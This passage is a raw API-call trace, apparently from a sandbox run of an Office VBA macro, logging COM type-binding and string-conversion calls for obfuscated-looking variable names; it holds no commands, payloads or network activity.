lHashVal=0x10294e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.034] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.034] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61fb6 | out: _Dst=0x67c2d40) returned 0x0 [0069.034] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XABAxQ") returned 0x10a3f7 [0069.034] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_XABAxQ" | out: _Dst="_B_var_XABAxQ") returned 0x0 [0069.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_XABAxQ") returned 14 [0069.034] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.034] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XABAxQ", lHashVal=0x10a3f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.034] IUnknown:Release (This=0x665ba50) returned 0xd [0069.034] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.034] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XABAxQ", lHashVal=0x10a3f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.034] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.034] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.035] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XABAxQ", lHashVal=0x10a3f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.035] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.035] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.035] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XABAxQ", lHashVal=0x10a3f7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.035] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.035] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.035] IUnknown:Release (This=0x665ba50) returned 0xd [0069.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10bbe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_XABAxQ") returned 14 [0069.035] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XABAxQ", lHashVal=0x10a3f7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0069.035] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61fb6 | out: _Dst=0x144ec0) returned 0x0 [0069.035] ITypeComp:RemoteBind (in: This=0x665ba60, szName="q_xCwA", lHashVal=0x10ab11, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61fde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="q_xCwA") returned 7 [0069.035] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="q_xCwA", lHashVal=0x10ab11, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61fde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="q_xCwA") returned 7 [0069.035] ITypeComp:RemoteBind (in: This=0x665bd30, szName="q_xCwA", lHashVal=0x10ab11, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.035] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="q_xCwA") returned 0x10ab11 [0069.035] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="q_xCwA" | out: _Dst="q_xCwA") returned 0x0 [0069.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="q_xCwA") returned 7 [0069.035] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.035] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="q_xCwA", lHashVal=0x10ab11, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.035] IUnknown:Release (This=0x665ba50) returned 0xd [0069.036] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.036] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="q_xCwA", lHashVal=0x10ab11, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.036] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.036] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.036] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="q_xCwA", lHashVal=0x10ab11, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.036] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.036] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.036] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="q_xCwA", lHashVal=0x10ab11, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.036] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61fde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="q_xCwA") returned 7 [0069.036] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="q_xCwA", lHashVal=0x10ab11, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.036] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.036] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61fde | out: _Dst=0x67c2d40) returned 0x0 [0069.036] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_q_xCwA") returned 0x10257b [0069.036] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_q_xCwA" | out: _Dst="_B_var_q_xCwA") returned 0x0 [0069.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_q_xCwA") returned 14 [0069.036] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.036] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_q_xCwA", lHashVal=0x10257b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.036] IUnknown:Release (This=0x665ba50) returned 0xd [0069.036] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.036] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_q_xCwA", lHashVal=0x10257b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.036] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.036] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.036] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_q_xCwA", lHashVal=0x10257b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.036] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.036] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.036] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_q_xCwA", lHashVal=0x10257b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.036] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.036] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.037] IUnknown:Release (This=0x665ba50) returned 0xd [0069.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10bee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_q_xCwA") returned 14 [0069.037] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_q_xCwA", lHashVal=0x10257b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x77004300000000, pDummy=0x0) returned 0x0 [0069.037] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61fde | out: _Dst=0x144ec0) returned 0x0 [0069.037] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wwQAw_Z", lHashVal=0x1016f5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62006, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wwQAw_Z") returned 8 [0069.037] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wwQAw_Z", lHashVal=0x1016f5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62006, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wwQAw_Z") returned 8 [0069.037] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wwQAw_Z", lHashVal=0x1016f5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wwQAw_Z") returned 0x1016f5 [0069.037] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="wwQAw_Z" | out: _Dst="wwQAw_Z") returned 0x0 [0069.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="wwQAw_Z") returned 8 [0069.037] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.037] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wwQAw_Z", lHashVal=0x1016f5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.037] IUnknown:Release (This=0x665ba50) returned 0xd [0069.037] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.037] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wwQAw_Z", lHashVal=0x1016f5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.037] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.037] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.037] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wwQAw_Z", lHashVal=0x1016f5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.037] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.037] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.038] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wwQAw_Z", lHashVal=0x1016f5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.038] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62006, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="wwQAw_Z") returned 8 [0069.038] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wwQAw_Z", lHashVal=0x1016f5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.038] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.038] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62006 | out: _Dst=0x67c2d40) returned 0x0 [0069.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wwQAw_Z") returned 0x101a79 [0069.038] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_wwQAw_Z" | out: _Dst="_B_var_wwQAw_Z") returned 0x0 [0069.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_wwQAw_Z") returned 15 [0069.038] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.038] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wwQAw_Z", lHashVal=0x101a79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.038] IUnknown:Release (This=0x665ba50) returned 0xd [0069.038] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.038] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wwQAw_Z", lHashVal=0x101a79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.038] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.038] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.038] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wwQAw_Z", lHashVal=0x101a79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.038] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.038] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.038] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wwQAw_Z", lHashVal=0x101a79, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.038] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.038] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.038] IUnknown:Release (This=0x665ba50) returned 0xd [0069.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10c1e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_wwQAw_Z") returned 15 [0069.038] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wwQAw_Z", lHashVal=0x101a79, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0) returned 0x0 [0069.038] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62006 | out: _Dst=0x144ec0) returned 0x0 [0069.039] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.039] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.039] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.039] IUnknown:Release (This=0x665ba50) returned 0xd [0069.039] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.039] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.039] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.039] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.039] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.039] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.039] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.039] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.039] IUnknown:Release (This=0x665ba50) returned 0xd [0069.039] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.039] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.039] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.039] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.039] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.039] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.039] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.039] IUnknown:Release (This=0x665ba50) returned 0xd [0069.039] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.039] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.039] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.040] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.040] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.040] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.040] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.040] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.040] IUnknown:Release (This=0x665ba50) returned 0xd [0069.040] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.040] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.040] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.040] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.040] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.040] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.040] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.040] IUnknown:Release (This=0x665ba50) returned 0xd [0069.040] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.040] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.040] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.040] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.040] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.040] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.040] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.040] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.041] IUnknown:Release (This=0x665ba50) returned 0xd [0069.041] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.041] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.041] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.041] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.041] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.041] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.041] IUnknown:QueryInterface (in: 